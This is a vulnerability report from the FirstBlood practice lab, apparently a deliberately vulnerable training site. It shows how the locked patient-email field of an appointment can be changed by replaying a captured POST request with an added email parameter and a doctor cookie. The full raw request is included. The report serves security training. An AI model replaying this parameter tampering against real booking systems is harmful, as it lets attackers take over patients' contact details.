FirstBlood-#877It is possible to modify the email address of an appointment.
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-29, vigilante Level 4 reported:

Summary:

It is possible to modify the email address of an appointment. The same vulnerability was present in V1 of First Blood.

Description:

When modifying an appointment the application tells us that "For safeguarding reasons you are only able to modify certain information about your appointment." The "patient email" field is grayed and we're unable to modify it through the webpage. However if we capture the POST request to modify the appointment message, we will be able to modify the email field.

Steps to Reproduce:

  1. Create an appointment with email "ff".

  1. Log in into a doctor's account so we get a "doctorAuthed" cookie in Step 5.
  2. Go to modify that appointment, /manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
  3. Click on "modify event" and capture the request with Burp
  4. Replay the request and add "&email=changedemail"
POST /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41 HTTP/1.1
Host: ca20e7622a6e-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b0b1f17cbc0fdc9a9ce23dfdf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Site-Req: permitted
Csrf: 99215d4e-0ff3-4275
Content-Length: 71
Origin: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com
Referer: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

message=test&id=2dbd91e1-b700-455e-a846-322be1985c41&email=changedemail
  1. After sending this, the patient's email address will change to "changedemail".

Impact

If someone got a hold of our appointment id and they added the "doctorAuthed" cookie, they'd be able to change the email address to their own email address.

P3 Medium

Endpoint: /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41

Parameter: &email

Payload: &email=changedemail


FirstBlood ID: 33
Vulnerability Type: Application/Business Logic

Our mistake: We did not intentionally leave the code to change emails if the correct values were set, however it created interesting results because most discovered this but missed bug ID 20 and 21 and whilst it was not possible to modify via integer, if the ID was known it would still work.